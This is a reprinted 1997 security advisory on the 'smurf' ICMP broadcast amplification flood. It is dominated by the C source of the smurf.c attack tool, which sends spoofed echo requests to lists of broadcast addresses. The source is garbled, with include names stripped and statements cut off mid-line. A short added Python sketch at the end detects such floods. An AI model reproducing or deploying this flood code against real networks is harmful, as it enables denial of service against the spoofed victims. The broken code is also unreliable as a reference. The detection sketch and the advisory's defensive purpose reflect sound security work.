TCP/IP FLOODING
Reported October 13, 1997 by TFreak
Systems Affected
Any system employing TCP/IP
The Problem
The smurf attack is quite simple. The program stores a list of broadcast addresses in an array, sends a spoofed ICMP echo request to each of those addresses in series, and then starts again. The result is a devastating attack upon the spoofed IP. Depending on the number of broadcast addresses used, many, many computers may respond to the echo request.
This attack can EASILY saturate a T1 circuit, rendering it completely useless.
HERE IS THE SMURF SOURCE CODE:
/*
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
* spoofs icmp packets from a host to various broadcast addresses resulting
* in multiple replies to that host from a single packet.
* disclaimer:
* I cannot and will not be held responsible nor legally bound for the
* malicious activities of individuals who come into possession of this
* program and I refuse to provide help or support of any kind and do NOT
* condone use of this program to deny service to anyone or any machine.
* This is for educational use only. Please don't abuse this.
* TFreak
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);
/* stamp */
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";
int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
FILE *bcastfile;
int i, sock, bcast, delay, num, pktsize, cycle = 0, x;
char buf[32], **bcastaddr = malloc(8192);
banner();
signal(SIGINT, ctrlc);
if (argc h_addr, he->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
num = atoi(argv[3]);
delay = atoi(argv[4]);
pktsize = atoi(argv[5]);
if ((bcastfile = fopen(argv[2], r)) "#" || buf[0] 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
Stopping the Problem:
MCI has a tool called DoSTracker that may help you track down Smurf users.
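A detection sketch for the traffic pattern described under "The Problem", added here as an example; it is not part of the original advisory and is not DoSTracker. The record format (source, destination, ICMP type), the function names, the threshold and the sample addresses are all assumptions made for illustration.

```python
import ipaddress
from collections import defaultdict

ECHO_REPLY, ECHO_REQUEST = 0, 8  # ICMP type numbers

# Constructed sample records (src, dst, icmp_type); all addresses are
# documentation ranges, not taken from the advisory.
LOCAL_NETS = [ipaddress.ip_network("192.0.2.0/24")]
SAMPLE = [
    ("203.0.113.10", "192.0.2.255", ECHO_REQUEST),   # request to our broadcast address
    ("203.0.113.20", "198.51.100.9", ECHO_REQUEST),  # ordinary ping ...
    ("198.51.100.9", "203.0.113.20", ECHO_REPLY),    # ... and its solicited reply
    ("198.51.100.1", "203.0.113.10", ECHO_REPLY),    # replies nobody asked for
    ("198.51.100.2", "203.0.113.10", ECHO_REPLY),
    ("198.51.100.3", "203.0.113.10", ECHO_REPLY),
    ("198.51.100.4", "203.0.113.10", ECHO_REPLY),
]

def broadcast_echo_requests(packets, local_nets):
    """Echo requests sent to the broadcast address of one of our subnets.

    Seeing these means our network is being used to multiply traffic; the
    source field is the address that will receive every reply.
    """
    bcasts = {net.broadcast_address for net in local_nets}
    return [(src, dst) for src, dst, typ in packets
            if typ == ECHO_REQUEST and ipaddress.ip_address(dst) in bcasts]

def unsolicited_reply_floods(packets, min_sources=3):
    """Hosts receiving echo replies from many sources they never pinged."""
    asked = {(src, dst) for src, dst, typ in packets if typ == ECHO_REQUEST}
    repliers = defaultdict(set)
    for src, dst, typ in packets:
        if typ == ECHO_REPLY and (dst, src) not in asked:
            repliers[dst].add(src)
    return {host: len(srcs) for host, srcs in repliers.items()
            if len(srcs) >= min_sources}

if __name__ == "__main__":
    print(broadcast_echo_requests(SAMPLE, LOCAL_NETS))
    print(unsolicited_reply_floods(SAMPLE))
```

The first check is what an operator of a network being used as a reflector would run; the second is the view from the flooded host's side, where the replies arrive from individual hosts that were never pinged.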
Credit:
Reported by TFreak
Posted here at NTSecurity.Net October 12, 1997